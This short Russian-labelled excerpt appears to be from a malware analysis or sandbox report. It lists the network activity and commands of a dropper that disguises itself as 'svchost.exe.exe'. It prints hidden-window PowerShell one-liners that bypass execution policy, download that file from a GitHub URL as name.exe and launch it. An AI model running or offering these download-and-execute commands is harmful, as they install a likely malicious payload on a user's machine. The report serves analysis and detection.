Техническая информация
- https://github.com/radikruster/newchecker/raw/master/svchost.exe.exe как name.exe
- 'gi##ub.com':443
- DNS ASK gi##ub.com
- '<SYSTEM32>\cmd.exe' /c powershell -ep bypass -nop -w 1 (New-Object System.Net.WebClient).DownloadFile('https://github.com/radikruster/newchecker/raw/master/svchost.exe.exe','name.exe')
- '<SYSTEM32>\cmd.exe' /c powershell -ep bypass -nop -w 1 (New-Object -com Shell.Application).ShellExecute('name.exe')
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ep bypass -nop -w 1 (New-Object -com Shell.Application).ShellExecute('name.exe')